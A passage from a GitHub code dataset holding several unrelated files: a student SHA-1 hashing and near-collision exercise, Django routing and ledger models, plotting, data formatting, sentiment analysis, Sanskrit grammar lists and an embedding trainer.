#print(f1,f2)\n\n if f1 in d2:\n\n s1 = d1[f1]\n s2 = d2[f1]\n break\n\n if f2 in d1:\n #print(f2)\n s2 = seed\n s1 = d1[f2]\n break\n\n\n nba1 = mutate(barray1,genSelection(s1,index))\n nba2 = mutate(barray2,genSelection(s2,index))\n\n #print(len(nba1))\n #print(len(nba2))\n print(\"\")\n\n return nba1, nba2\n\ndef attackFiles(file1, file2, length):\n\n print(\"\\nprocessing images...\", end = \"\")\n\n barray1 = readBytes(file1)\n barray2 = readBytes(file2)\n\n nba1, nba2 = attackBytes(barray1,barray2, length, 100)\n\n nfile1 = \"new_\" + file1\n nfile2 = \"new_\" + file2\n\n writeBytes(nba1,nfile1)\n writeBytes(nba2,nfile2)\n\n\n\nx = []\n\nfor j in range(534): x.append(randByte())\n\ntext1 = \"abc\"\ntext2 = \"acc\" #one bit changed: b = 01100010, c = 01100011\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"text1 = \" + text1)\nprint(\"sha1_1 = \" + nospace(sha11))\nprint(\"sha1_2 = \" + nospace(sha12))\nprint(\"sha1_1 = \" + prettyHex(toInt(sha11),20))\nprint(\"expected = \" + \"A9993E364706816ABA3E25717850C26C9CD0D89D\")\n\nprint(\"sha1_2 = \" + prettyHex(toInt(sha12),20))\nprint(\"hamming distance = \" + str(hamming(sha11,sha12)))\nprint(\"______________________________________________________\\n\")\n\n#\"\"\"\nattackFiles(\"battleship.bmp\", \"mac.bmp\",4)\nbt1 = readBytes(\"new_battleship.bmp\")\nbt2 = readBytes(\"new_mac.bmp\")\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"sha1_battleship = \" + prettyHex(toInt(sha11),20))\nprint(\"sha1_flower = \" + prettyHex(toInt(sha12),20))\n#\"\"\"\n\n#\"\"\"\ntext1 = \"qazwsxedcrfvtgbyhnujmik,ol.p;/['][poiuytrewqasdfghj\"\ntext2 = \"bchdkahdnsmxboenskckqlsjba,mbsiudqweqweqweqaqasdsdf\"\n\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nprint(\"___________________________________________________\\n\")\nprint(\"processing texts...\", end = \"\")\nnba1, nba2 = attackBytes(bt1, bt2,4)\n\ntext1 = nba1.decode(\"utf-8\")\ntext2 = nba2.decode(\"utf-8\")\n\nprint(\"\")\nprint(\"text1_m = \" + text1)\nprint(\"text2_m = \" + text2)\nprint(\"\")\n\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"sha1_1m = \" + prettyHex(toInt(sha11),20))\nprint(\"sha1_1m = \" + prettyHex(toInt(sha12),20))\n#\"\"\"\n\ntext1 = \"pa{wsyddbrgvtfbyioujmhj-nm/p;/Z&\\Zpoiuxusevqareffhj\"\ntext2 = \"bbidkaiensmxcodnskckqlrjb`,mbsitdqweqvepwdq`qardsef\"\n\nprint(\"\")\nprint(\"text1_m = \" + text1)\nprint(\"text2_m = \" + text2)\nprint(\"\")\n\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"sha1_1m = \" + prettyHex(toInt(sha11),20))\nprint(\"sha1_1m = \" + prettyHex(toInt(sha12),20))","repo_name":"stefanrzv2000/crypto","sub_path":"T9/sha1.py","file_name":"sha1.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1250358653","text":"from tyadmin_api import auto_views\nfrom django.urls import re_path, include, path\nfrom rest_framework.routers import DefaultRouter\n \nrouter = DefaultRouter(trailing_slash=False)\n \nrouter.register('permission', auto_views.PermissionViewSet)\n \nrouter.register('group', auto_views.GroupViewSet)\n \nrouter.register('content_type', auto_views.ContentTypeViewSet)\n \nrouter.register('t_user', auto_views.TUserViewSet)\n \nrouter.register('t_analysis', auto_views.TAnalysisViewSet)\n \nrouter.register('t_camera', auto_views.TCameraViewSet)\n \nrouter.register('user_profile', auto_views.UserProfileViewSet)\n \nurlpatterns = [\n re_path('^', include(router.urls)),\n ]\n ","repo_name":"thomas-yanxin/the-eye-knows-the-garbage","sub_path":"tyadmin_api/auto_url.py","file_name":"auto_url.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"40"} +{"seq_id":"6073256896","text":"# This program draws the graphs of the action versus the Markovian\n# time for the hot and the cold starts of the thermalization\n\nfrom math import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ni_cold, S_cold = np.genfromtxt(\"../results/cold_therm.dat\", unpack=True)\ni_hot, S_hot = np.genfromtxt(\"../results/hot_therm.dat\", unpack=True)\n\nfig1 = plt.figure(1)\nplt.plot(i_cold[:100], S_cold[:100], ls='-',\n lw=1, c='blue', label='Cold Start')\nplt.plot(i_hot[:100], S_hot[:100], ls='-', lw=1, c='red', label='Hot Start')\nplt.title(\"Thermalization\")\nplt.xlabel(\"Markovian time\")\nplt.ylabel(\"S\")\nplt.grid(linestyle=':')\nplt.legend()\nplt.text(77.5, 420, \"Parameters:\\n\\nN = 64\\nM = 1\\nW = 1\",\n size=12, bbox=dict(fc=\"white\"))\n\n# Zoom on the first 25 indices\nfig2 = plt.figure(2)\nplt.plot(i_cold[:26], S_cold[:26], ls='-',\n lw=1, c='blue', label='Cold Start')\nplt.plot(i_hot[:26], S_hot[:26], ls='-',\n lw=1, c='red', label='Hot Start')\nplt.title(\"Thermalization (zoom)\")\nplt.xlabel(\"Markovian time\")\nplt.ylabel(\"S\")\nplt.grid(linestyle=':')\nplt.legend()\nplt.text(19.57, 420, \"Parameters:\\n\\nN = 64\\nM = 1\\nW = 1\",\n size=12, bbox=dict(fc=\"white\"))\n\n# Saving the graphs\nfig1.savefig('graphs/first_thermalization.png', dpi=(200), bbox_inches='tight')\nfig2.savefig('graphs/thermalization.png', dpi=(200), bbox_inches='tight')\n","repo_name":"BeaGiudici/Harmonic-Oscillator","sub_path":"fit/thermal_fit.py","file_name":"thermal_fit.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33635715196","text":"import json\nimport argparse\nfrom tqdm import tqdm\n\n\ndef process(infile, outsrc, outtgt, format):\n out_examples = []\n with open(infile, 'r', encoding='utf-8') as fin:\n for line in tqdm(fin):\n ex = json.loads(line)\n source = ex['article']['text']\n target = ex['abstract']['text']\n if len(source) == 0 or len(target) == 0:\n continue\n if format == 'txt':\n out_examples.append((source, target))\n elif format == 'json':\n out_examples.append({'src': source, 'tgt': target})\n\n if format == 'txt':\n with open(outsrc, 'w', encoding='utf-8') as fsrc, open(outtgt, 'w', encoding='utf-8') as ftgt:\n fsrc.write('\\n'.join([ex[0] for ex in out_examples]))\n ftgt.write('\\n'.join([ex[1] for ex in out_examples]))\n elif format == 'json':\n with open(outsrc, 'w', encoding='utf-8') as fout:\n fout.write('\\n'.join([json.dumps(ex) for ex in out_examples]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='format.py', formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument('-input_json', default='', help='input json file')\n parser.add_argument('-output_source', default='', help='output source file')\n parser.add_argument('-output_target', default='', help='output target file')\n parser.add_argument('-format', default='txt', help='output format type')\n args = parser.parse_args()\n process(args.input_json, args.output_source, args.output_target, args.format)\n","repo_name":"uclanlp/DeepKPG","sub_path":"data/format_summarization.py","file_name":"format_summarization.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"7328645079","text":"over18 = men = wu20 = 0\nwhile True:\n print('---- Sign up ----')\n age = int(input('Age: '))\n while age < 0:\n age = int(input('Invalid!\\nAge: '))\n\n if age >= 18:\n over18 += 1\n\n gender = str(input('Gender [M/F]: ')).upper().strip()\n while gender != 'M' and gender != 'F':\n gender = str(input('Invalid!\\nGender [M/F]: ')).upper().strip()\n\n if gender == 'M':\n men += 1\n\n if gender == 'F' and age < 20:\n wu20 += 1\n\n answer = str(input('Do you wanna continue? [Y/N] ')).upper().strip()\n while answer != 'Y' and answer != 'N':\n answer = str(input('Invalid!\\nDo you wanna continue? [Y/N] ')).upper().strip()\n\n if answer == 'N':\n break\n\nprint(f'''There is(are) {over18} person(s) over 18 years old\nThere is(are) {men} man(men) signed up\nThere is(are) {wu20} woman(women) under 20 years old''')","repo_name":"heitorlisboa/python-studies","sub_path":"CursoEmVídeo/PythonExercícios/ex069 - Analisador completo v2 (infinito).py","file_name":"ex069 - Analisador completo v2 (infinito).py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25164805597","text":"from django.conf.urls import url\nfrom . import views\n \nurlpatterns = [\n url(r'^$', views.index),\n url(r'^tailor$', views.tailor),\n url(r'^process_survey$', views.process_survey),\n url(r'^matches$', views.matches),\n url(r'^sample$', views.sample_booking),\n]","repo_name":"spartantech8/Paradise-Tailored","sub_path":"apps/paradise_tailored_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24227542496","text":"from bokeh.plotting import figure\r\nfrom bokeh.io import output_file, show\r\nfrom bokeh.models import DatetimeTickFormatter\r\nimport pandas\r\nfrom datetime import datetime\r\n\r\ndf = pandas.read_json(\"https://pomber.github.io/covid19/timeseries.json\")\r\n\r\n\r\ndf1 = pandas.DataFrame(columns=['Date', 'Confirmed', 'Deaths', 'Recovered'])\r\n\r\n\r\nfor i in list(df[\"Australia\"]):\r\n df1 = df1.append({'Date': datetime.strptime(i[\"date\"], '%Y-%m-%d'), 'Confirmed': i[\"confirmed\"], 'Deaths': i[\"deaths\"], 'Recovered': i[\"recovered\"]}, ignore_index=True)\r\n\r\n\r\nf=figure(plot_width=700,plot_height=500,tools='save',x_axis_type='datetime')\r\n\r\nf.title.text=\"Covid-19 statistics for Australia\"\r\nf.title.text_font_style=\"bold\"\r\nf.xaxis.axis_label=\"Date\"\r\n#convert time to AU standard day/month rather than month/day\r\nf.xaxis.formatter=DatetimeTickFormatter(days=\"%d/%m\")\r\nf.yaxis.axis_label=\"Cases\"\r\nf.yaxis.formatter.use_scientific = False\r\n\r\n#create plot\r\nf.line(df1[\"Date\"],df1[\"Confirmed\"],color=\"Orange\")\r\nf.line(df1[\"Date\"],df1[\"Deaths\"],color=\"Red\")\r\nf.line(df1[\"Date\"],df1[\"Recovered\"],color=\"Green\")\r\n\r\nshow(f)","repo_name":"craigles75/corona","sub_path":"corona_bokeh.py","file_name":"corona_bokeh.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4565299385","text":"# -*- coding: utf-8 -*-\n\"\"\"\n vyakarana.lists\n ~~~~~~~~~~~~~~~\n\n Lists of various terms, designations, and sounds. Some of these\n lists could probably be inferred programmatically, but for the sake\n of basic sanity these are encoded explicitly. Thankfully these lists\n are rather small.\n\n :license: MIT and BSD\n\"\"\"\n\n#: Defined in rule 3.4.78. These 18 affixes are used to form verbs.\n#: The first 9 are called \"parasmaipada\" (1.4.99), and the last 9 are\n#: called \"ātmanepada\" (1.4.100).\nTIN = ['tip', 'tas', 'Ji', 'sip', 'Tas', 'Ta', 'mip', 'vas', 'mas',\n 'ta', 'AtAm', 'Ja', 'TAs', 'ATAm', 'Dvam', 'iw', 'vahi', 'mahiN']\n\n\n#: Abstract suffixes that are replaced with items from `TIN`.\n#: Collectively, they are called the \"lakāra\" or just \"la\".\nLA = set([\n 'la~w', 'li~w', 'lu~w', 'lf~w', 'le~w', 'lo~w',\n 'la~N', 'li~N', 'lu~N', 'lf~N'\n])\n\n\n#: Various pratyaya\nPRATYAYA = set([\n 'luk', 'Slu', 'lup',\n 'Sap', 'Syan', 'Snu', 'Sa', 'Snam', 'u', 'SnA',\n 'Ric', 'Rin'\n]) | LA\n\n\n#: Technical designations (1.3.2 - 1.3.9)\nIT = (set([L + 'it' for L in 'kKGNcYwqRpmS'])\n | set([L + 'dit' for L in 'aiuUfxo'])\n | set(['qvit', 'wvit'])\n | set(['svaritet', 'anudattet', 'svarita', 'anudatta']))\n\n\n#: saṃjñā for verb 'pada'\nPADA = ['parasmaipada', 'atmanepada']\n\n\n#: saṃjñā for various persons\nPURUSHA = ['prathama', 'madhyama', 'uttama']\n\n\n#: saṃjñā for various numbers\nVACANA = ['ekavacana', 'dvivacana', 'bahuvacana']\n\n\n#: saṃjñā for case triplets\nVIBHAKTI = ['prathama', 'dvitiya', 'trtiya', 'caturthi',\n 'pancami', 'sasthi', 'saptami']\n\n\n#: saṃjñā for verb suffixes\nDHATUKA = ['sarvadhatuka', 'ardhadhatuka']\n\n\n#: saṃjñā for kāraka relations (currently unused)\nKARAKA = ['karta', 'karma', 'karana', 'adhikarana', 'sampradana', 'apadana']\n\n\n#: All saṃjñā\nSAMJNA = set([\n 'guna', 'vrddhi',\n 'dhatu', 'anga', 'pada', 'pratyaya',\n 'krt', 'taddhita',\n 'abhyasa', 'abhyasta',\n 'tin', 'sup',\n]) | set(PADA + PURUSHA + VACANA + VIBHAKTI + DHATUKA + KARAKA)\n\n\n#: A collection of various sounds, including:\n#:\n#: - savarṇa sets (1.1.69)\n#: - single-item sets (1.1.70)\n#: - pratyāhāra (1.1.71)\nSOUNDS = set([\n # 1.1.69 aṇudit savarṇasya cāpratyayaḥ\n 'a', 'i', 'u', 'f', 'x',\n 'ku~', 'cu~', 'wu~', 'tu~', 'pu~',\n\n # 1.1.70 taparas tatkālasya\n 'at', 'At', 'it', 'It', 'ut', 'Ut', 'ft', 'Ft', 'et', 'Et', 'ot', 'Ot',\n\n # 1.1.71 ādir antyena sahetā\n # Although the Shiva Sutras allow a large number of pratyāhāras,\n # only the following are used in the Ashtadhyayi.\n # (Sharma Volume I, p. 33)\n 'eN', 'yaY', 'aR', 'Cav', 'aw',\n 'Jaz', 'Baz',\n 'ak', 'ik', 'uk', 'yaR', 'iR', 'Nam', 'am', 'yam',\n 'ac', 'ec', 'Ec', 'ic', 'may', 'Jay', 'Kay', 'yay',\n 'Sar', 'yar', 'Jar', 'Kar', 'car',\n 'JaS', 'jaS', 'baS', 'S', 'haS', 'vaS',\n 'al', 'hal', 'sal', 'val', 'ral', 'Jal'\n])\n","repo_name":"sanskrit/vyakarana","sub_path":"vyakarana/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"16561039720","text":"import sys\n\ndef search_by_key(company: str) -> str:\n COMPANIES = {\n 'Apple': 'AAPL',\n 'Microsoft': 'MSFT',\n 'Netflix': 'NFLX',\n 'Tesla': 'TSLA',\n 'Nokia': 'NOK'\n }\n STOCKS = {\n 'AAPL': 287.73,\n 'MSFT': 173.79,\n 'NFLX': 416.90,\n 'TSLA': 724.88,\n 'NOK': 3.37\n }\n comp = ''\n for val in COMPANIES:\n if company.capitalize() == val:\n comp = COMPANIES[val]\n if comp == '':\n return \"Unknown company\"\n for val in STOCKS:\n if comp == val:\n return STOCKS[val]\n\ndef main():\n if len(sys.argv) == 2:\n print(search_by_key(sys.argv[1]))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"MashkaCoder/piscine_python_data_science42","sub_path":"day01/ex02/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40311009461","text":"from flask_smorest import Blueprint\nfrom flask.views import MethodView\nfrom flask import jsonify\nfrom app.models.pet import Pet\nfrom app.models.breed import Breed\nfrom app.schemas.pet import pets_schema, pet_query_schema, pet_schema, pet_update_schema\nfrom app import db\nimport datetime\n\nclass PetMessageCode ():\n NOT_FOUND = \"La mascota no existe\"\n\nbp = Blueprint(\"pet_api\", __name__)\n\nPER_PAGE_DEFAULT = 5\n\n@bp.route(\"/\")\nclass Pets(MethodView):\n @bp.arguments(pet_query_schema, location=\"query\")\n @bp.response(200, pets_schema)\n @bp.paginate(page_size=PER_PAGE_DEFAULT)\n def get(self, query, pagination_parameters):\n \"\"\"Listar mascota\"\"\"\n pets = Pet.query.order_by(Pet.birth_date.desc(), Pet.name.desc(), Pet.owner_name.desc())\n\n pagination_parameters.item_count = pets.count()\n\n if \"owner_dni\" in query.keys():\n pets = Pet.query.filter(Pet.owner_dni == query[\"owner_dni\"])\n \n return pets.paginate(page=pagination_parameters.page, per_page=pagination_parameters.page_size, error_out=True).items\n \n @bp.arguments(pet_schema)\n @bp.response(201, pet_schema)\n def post(self, new_data):\n \"\"\"Agregar mascota\"\"\"\n if Breed.query.get(new_data.breed_id) is None:\n return jsonify({ \"message\": \"Raza inválida\"}), 422 \n\n db.session.add(new_data)\n db.session.commit()\n\n return new_data\n\n@bp.route(\"/<int:id>\")\nclass PetsById(MethodView):\n @bp.response(200, pet_schema)\n def get(self, id):\n \"\"\"Obtener mascota por id\"\"\"\n pet = Pet.query.get(id)\n\n if pet is None:\n return jsonify({\"message\": PetMessageCode.NOT_FOUND}), 404\n \n return pet\n \n @bp.arguments(pet_update_schema)\n @bp.response(200, pet_schema)\n def put(self, data, id):\n \"\"\"Actualizar mascota por id\"\"\"\n if Breed.query.get(data[\"breed_id\"]) is None:\n return jsonify({ \"message\": \"Raza inválida\"}), 422 \n \n pet = Pet.query.get(id)\n\n if pet is None:\n return jsonify({\"message\": PetMessageCode.NOT_FOUND}), 404\n\n pet.from_dict(**data)\n pet.updated_at = datetime.datetime.now()\n\n db.session.add(pet)\n db.session.commit()\n\n return pet\n\n @bp.response(200)\n def delete(self, id):\n \"\"\"Eliminar mascota por id\"\"\"\n pet = Pet.query.get(id)\n \n if pet is None:\n return jsonify({\"message\": PetMessageCode.NOT_FOUND}), 404\n \n db.session.delete(pet)\n db.session.commit()\n\n return jsonify({\"message\": \"Mascota eliminada con éxito\"})","repo_name":"Rodolfo-Andre/flask-application","sub_path":"app/blueprints/pet_api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73897544120","text":"import pdb\nimport os\nimport logging\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom sklearn import metrics\n\n\nclass Trainer():\n def __init__(self, model, data, params):\n self.model = model\n self.data = data\n self.optimizer = None\n self.params = params\n\n if params.optimizer == \"SGD\":\n self.optimizer = optim.SGD(self.model.parameters(), lr=params.lr, momentum=params.momentum)\n if params.optimizer == \"Adam\":\n self.optimizer = optim.Adam(self.model.parameters(), lr=params.lr)\n\n self.criterion = nn.MarginRankingLoss(self.params.margin, reduction='sum')\n\n self.best_metric = 1e10\n self.last_metric = 1e10\n self.bad_count = 0\n\n assert self.optimizer is not None\n\n def one_epoch(self):\n all_pos_scores = []\n all_neg_scores = []\n total_loss = 0\n for b in range(self.params.nBatches):\n batch_h, batch_t, batch_r, batch_y = self.data.get_batch(b)\n loss, pos_score, neg_score = self.model(batch_h, batch_t, batch_r, batch_y)\n\n all_pos_scores += pos_score.detach().cpu().tolist()\n all_neg_scores += neg_score.detach().cpu().tolist()\n\n total_loss += loss.detach().cpu()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n all_labels = [0] * len(all_pos_scores) + [1] * len(all_neg_scores)\n auc = metrics.roc_auc_score(all_labels, all_pos_scores + all_neg_scores)\n\n return total_loss, auc\n\n def select_model(self, log_data):\n if log_data['auc'] < self.best_metric:\n self.bad_count = 0\n torch.save(self.model, os.path.join(self.params.exp_dir, 'best_model.pth')) # Does it overwrite or fuck with the existing file?\n logging.info('Better model found w.r.t MR. Saved it!')\n self.best_mr = log_data['auc']\n else:\n self.bad_count = self.bad_count + 1\n if self.bad_count > self.params.patience:\n logging.info('Out of patience. Stopping the training loop.')\n return False\n self.last_metric = log_data['auc']\n return True\n","repo_name":"kkteru/node-embeddings","sub_path":"managers/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"40"} +{"seq_id":"6514129063","text":"from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\ndef analyze_tweets(tweet_list):\n neg, neu, pos, count = 0, 0, 0, 0\n analyzer = SentimentIntensityAnalyzer()\n pos_tweet, neg_tweet = {'score': 0, 'id': 0}, {'score': 0, 'id': 0}\n for tweet in tweet_list: # Sum up all of the scores\n score = analyzer.polarity_scores(tweet.text)\n neg += score['neg']\n neu += score['neu']\n pos += score['pos']\n if score['neg'] > neg_tweet['score']:\n neg_tweet['score'] = score['neg']\n neg_tweet['id'] = tweet.id\n if score['pos'] > pos_tweet['score']:\n pos_tweet['score'] = score['pos']\n pos_tweet['id'] = tweet.id\n count += 1\n if count == 0:\n return {\"error\": \"No matches were found for this phrase\"}\n \n # Nomralize the scores for the number of tweets searched\n neg /= count \n neu /= count\n pos /= count\n \n statement = \"\"\n analysis = \"\"\n # Assign an analysis and statement\n if neg == pos:\n statement += \"Neutral\"\n analysis += \"Score: 1.000\"\n elif neg == 0:\n statement += \"Maximum Positivity\"\n analysis += \"No detected negativity\"\n elif pos == 0:\n statement += \"Maximum Negativity\"\n analysis += \"No detected positivity\"\n elif pos > neg:\n ratio = pos / neg\n if ratio < 2:\n statement += \"Slightly Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 5:\n statement += \"Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 10:\n statement += \"Very Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n else:\n statement += \"Extremely Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif neg > pos:\n ratio = neg / pos\n if ratio < 2:\n statement += \"Slightly Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 5:\n statement += \"Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 10:\n statement += \"Very Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n else:\n statement += \"Extremely Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n else:\n statement += \"This is a neutral subject!\"\n \n return {\n \"statement\": statement, \n \"analysis\": analysis, \n # \"count\": count, # for debugging\n \"pos_tweet\": pos_tweet, \n \"neg_tweet\": neg_tweet\n }\n \ndef isEnglish(s):\n try:\n s.decode('ascii')\n except:\n return False\n else:\n return True","repo_name":"baileyguthrie/birb.io","sub_path":"webapp/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70993411000","text":"from decimal import Decimal\nfrom string import ascii_lowercase, digits\nfrom uuid import uuid4, UUID\n\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\nfrom django.core.validators import MinValueValidator\nfrom django.db import models, transaction, IntegrityError\nfrom django.db.models import Q, Sum, F, ExpressionWrapper, DecimalField, Value, Case, When, QuerySet\nfrom django.db.models.functions import Coalesce\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_ledger.models.mixins import CreateUpdateMixIn\nfrom django_ledger.models.utils import lazy_loader\nfrom django_ledger.settings import (DJANGO_LEDGER_TRANSACTION_MAX_TOLERANCE, DJANGO_LEDGER_DOCUMENT_NUMBER_PADDING,\n DJANGO_LEDGER_EXPENSE_NUMBER_PREFIX, DJANGO_LEDGER_INVENTORY_NUMBER_PREFIX,\n DJANGO_LEDGER_PRODUCT_NUMBER_PREFIX)\n\nITEM_LIST_RANDOM_SLUG_SUFFIX = ascii_lowercase + digits\n\n\nclass ItemModelValidationError(ValidationError):\n pass\n\n\nclass UnitOfMeasureModelQuerySet(models.QuerySet):\n pass\n\n\n# UNIT OF MEASURES MODEL....\nclass UnitOfMeasureModelManager(models.Manager):\n \"\"\"\n A custom defined QuerySet Manager for the UnitOfMeasureModel.\n \"\"\"\n\n def for_entity(self, entity_slug: str, user_model) -> QuerySet:\n \"\"\"\n Fetches the UnitOfMeasureModels associated with the provided EntityModel and UserModel.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The EntityModel slug or EntityModel used to filter the QuerySet.\n user_model: UserModel\n The Django UserModel to check permissions.\n\n Returns\n -------\n QuerySet\n A QuerySet with applied filters.\n \"\"\"\n qs = self.get_queryset()\n if isinstance(entity_slug, lazy_loader.get_entity_model()):\n return qs.filter(\n Q(entity=entity_slug) &\n (\n Q(entity__admin=user_model) |\n Q(entity__managers__in=[user_model])\n )\n )\n return qs.filter(\n Q(entity__slug__exact=entity_slug) &\n (\n Q(entity__admin=user_model) |\n Q(entity__managers__in=[user_model])\n )\n )\n\n def for_entity_active(self, entity_slug: str, user_model):\n \"\"\"\n Fetches the Active UnitOfMeasureModels associated with the provided EntityModel and UserModel.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The EntityModel slug or EntityModel used to filter the QuerySet.\n user_model: UserModel\n The Django UserModel to check permissions.\n\n Returns\n -------\n QuerySet\n A QuerySet with applied filters.\n \"\"\"\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(is_active=True)\n\n\nclass UnitOfMeasureModelAbstract(CreateUpdateMixIn):\n \"\"\"\n Base implementation of a Unit of Measure assigned to each Item Transaction.\n\n Attributes\n ----------\n uuid: UUID\n This is a unique primary key generated for the table. The default value of this field is uuid4().\n name: str\n The name of the unit of measure. Maximum of 50 characters.\n unit_abbr: str\n An abbreviation of the unit of measure used as an identifier or slug for URLs and queries.\n is_active: bool\n A boolean representing of the UnitOfMeasureModel instance is active to be used on new transactions.\n entity: EntityModel\n The EntityModel associated with the UnitOfMeasureModel instance.\n \"\"\"\n uuid = models.UUIDField(default=uuid4, editable=False, primary_key=True)\n name = models.CharField(max_length=50, verbose_name=_('Unit of Measure Name'))\n unit_abbr = models.SlugField(max_length=10, verbose_name=_('UoM Abbreviation'))\n is_active = models.BooleanField(default=True, verbose_name=_('Is Active'))\n\n # todo: rename to entity_model\n entity = models.ForeignKey('django_ledger.EntityModel',\n editable=False,\n on_delete=models.CASCADE,\n verbose_name=_('UoM Entity'))\n\n objects = UnitOfMeasureModelManager.from_queryset(queryset_class=UnitOfMeasureModelQuerySet)()\n\n class Meta:\n abstract = True\n indexes = [\n models.Index(fields=['entity'])\n ]\n unique_together = [\n ('entity', 'unit_abbr')\n ]\n\n def __str__(self):\n return f'{self.name} ({self.unit_abbr})'\n\n\n# ITEM MODEL....\nclass ItemModelQuerySet(models.QuerySet):\n \"\"\"\n A custom-defined ItemModelQuerySet that implements custom QuerySet methods related to the ItemModel.\n \"\"\"\n\n def active(self):\n \"\"\"\n Filters the QuerySet to only active Item Models.\n\n Returns\n -------\n ItemModelQuerySet\n A QuerySet with applied filters.\n \"\"\"\n return self.filter(is_active=True)\n\n def products(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as products.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=True) &\n Q(for_inventory=True)\n ) |\n Q(item_role=ItemModel.ITEM_ROLE_PRODUCT)\n )\n\n def services(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as services.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=True) &\n Q(for_inventory=False)\n ) |\n Q(item_role=ItemModel.ITEM_ROLE_SERVICE)\n )\n\n def expenses(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as expenses.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=False)\n ) | Q(item_role=ItemModel.ITEM_ROLE_EXPENSE)\n )\n\n def inventory_wip(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as inventory.\n These types of items cannot be sold as they are not considered a finished product.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=True)\n ) | Q(item_role=ItemModel.ITEM_ROLE_INVENTORY)\n )\n\n def inventory_all(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as inventory.\n These types of items may be finished or unfinished.\n\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=True)\n ) | Q(item_role=ItemModel.ITEM_ROLE_INVENTORY)\n ) |\n (\n (\n Q(is_product_or_service=True) &\n Q(for_inventory=True)\n ) |\n Q(item_role=ItemModel.ITEM_ROLE_PRODUCT)\n\n )\n )\n\n def bills(self):\n \"\"\"\n Filters the QuerySet to ItemModels that are eligible only for bills..\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=False) &\n 